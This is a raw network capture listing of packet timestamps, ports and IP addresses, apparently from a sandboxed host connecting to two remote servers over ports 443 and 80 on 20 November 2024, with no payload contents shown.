Nov 20, 2024 10:11:09.270025969 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:09.270092964 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:09.270143986 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:09.270365953 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:09.270394087 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:09.471806049 CET	49164	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:09.471852064 CET	443	49164	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:09.471906900 CET	49164	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:09.472238064 CET	49164	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:09.472254038 CET	443	49164	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:10.121526003 CET	443	49164	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:10.121628046 CET	49164	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:10.127126932 CET	49164	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:10.127142906 CET	443	49164	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:10.127542973 CET	443	49164	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:10.128344059 CET	49164	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:10.171344995 CET	443	49164	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:10.406816959 CET	443	49164	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:10.406903982 CET	443	49164	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:10.407267094 CET	49164	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:10.411257029 CET	49164	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:10.411279917 CET	443	49164	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:10.427567005 CET	49165	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:10.427628040 CET	443	49165	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:10.427686930 CET	49165	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:10.427834988 CET	49165	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:10.427855015 CET	443	49165	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:11.045557022 CET	443	49165	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:11.046159029 CET	49165	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:11.046184063 CET	443	49165	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:11.046987057 CET	49165	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:11.046991110 CET	443	49165	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:11.335602045 CET	443	49165	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:11.335675955 CET	443	49165	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:11.335722923 CET	49165	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:11.335860968 CET	49165	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:11.335882902 CET	443	49165	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:11.567214012 CET	49166	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:11.567275047 CET	443	49166	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:11.567332983 CET	49166	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:11.567698956 CET	49166	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:11.567719936 CET	443	49166	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:12.380634069 CET	443	49166	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:12.382275105 CET	49166	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:12.384047985 CET	49166	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:12.384062052 CET	443	49166	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:12.385391951 CET	49166	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:12.385399103 CET	443	49166	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:12.665195942 CET	443	49166	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:12.665746927 CET	443	49166	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:12.665903091 CET	49166	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:12.679307938 CET	49166	443	192.168.2.22	198.244.140.41
Nov 20, 2024 10:11:12.679336071 CET	443	49166	198.244.140.41	192.168.2.22
Nov 20, 2024 10:11:12.719888926 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:12.725147009 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:12.726214886 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:12.726342916 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:12.732362032 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454144001 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454161882 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454174995 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454252005 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.454328060 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454339981 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454349995 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454376936 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.454389095 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.454540968 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454551935 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454626083 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.454710960 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454721928 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.454757929 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.460696936 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.460830927 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.460844040 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.460859060 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.460875988 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.461191893 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.461244106 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.505033016 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.590362072 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.590383053 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.590394974 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.590434074 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.590466976 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.590509892 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.590570927 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.590611935 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.590625048 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.590672970 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.590672970 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.591048002 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.591105938 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.591358900 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.591413021 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.591432095 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.591444969 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.591469049 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.591484070 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.591720104 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.591770887 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.592235088 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.592293024 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.592308044 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.592320919 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.592363119 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.592669010 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.592725039 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.593163013 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.593173981 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.593185902 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.593216896 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.593230963 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.593449116 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.593502998 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.594075918 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.594089031 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.594099998 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.594136000 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.594149113 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.596388102 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.596450090 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.598613024 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.598634005 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.598692894 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.730685949 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.730741978 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.730753899 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.730901957 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.730907917 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.730907917 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.730916977 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.730931044 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.730950117 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.730972052 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.731605053 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.731620073 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.731632948 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.731662035 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.731678009 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.731771946 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.731784105 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.731796026 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.731827974 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.731844902 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.732058048 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.732110977 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.732249975 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.732264042 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.732306004 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.732604027 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.732616901 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.732629061 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.732645035 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.732660055 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.732676983 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.733108997 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.733164072 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.733397007 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.733408928 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.733454943 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.733468056 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.733599901 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.733613014 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.733625889 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.733639002 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.733658075 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.733673096 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.734364033 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.734390020 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.734401941 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.734422922 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.734483957 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.734791994 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.734805107 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.734817982 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.734829903 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.734849930 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.734862089 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.735330105 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.735387087 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.735433102 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.735446930 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.735483885 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.735501051 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.735774994 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.735788107 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.735799074 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.735815048 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.735836983 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.735852957 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.738312006 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.738329887 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.738369942 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.738389015 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.738430023 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.738442898 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.738526106 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.738624096 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.738635063 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.738646984 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.738679886 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.738694906 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.738791943 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.738845110 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.738876104 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.738925934 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.739037991 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.739093065 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.866667032 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.866764069 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.866796017 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.866849899 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.866878986 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.866913080 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.866913080 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.866913080 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.867014885 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867047071 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.867050886 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867070913 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.867088079 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867094040 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.867129087 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.867280960 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867330074 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867336035 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.867369890 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.867846012 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867880106 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867903948 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.867913961 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867917061 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.867949009 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867981911 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.867993116 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.868016005 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.868022919 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.868052006 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.868060112 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.868089914 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.868573904 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.868607044 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.868630886 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.868643999 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.868668079 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.868705034 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.868737936 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.868753910 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.868755102 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.868792057 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.868837118 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.869139910 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.869174004 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.869198084 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.869206905 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.869218111 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.869240999 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.869247913 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.869276047 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.869282007 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.869309902 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.869318008 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.869349003 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.869966984 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870022058 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870026112 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.870057106 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870101929 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.870101929 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870131969 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.870138884 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870146990 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.870182991 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870193005 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.870217085 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870256901 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.870850086 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870884895 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870907068 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.870918989 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870929956 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.870954037 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870961905 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.870987892 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.870996952 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.871025085 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.871031046 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.871057987 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.871064901 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.871102095 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.871769905 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.871804953 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.871838093 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.871838093 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.871855021 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.871872902 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.871882915 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.871906996 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.871915102 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.871942043 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.871948004 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.871975899 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.871984959 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.872015953 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.872673988 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.872709036 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.872735977 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.872741938 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.872751951 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.872777939 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.872786045 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.872812986 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.872818947 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.872848034 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.872853041 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.872888088 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.873661041 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.873709917 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.873743057 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.873748064 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.873765945 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.873778105 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.873784065 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.873806953 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.873855114 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.873910904 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.873981953 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874017000 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874036074 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.874059916 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.874260902 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874294043 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874317884 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.874327898 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874341011 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.874362946 CET	80	49167	66.63.187.231	192.168.2.22
Nov 20, 2024 10:11:13.874386072 CET	49167	80	192.168.2.22	66.63.187.231
Nov 20, 2024 10:11:13.874403954 CET	49167	80	192.168.2.22	66.63.187.231
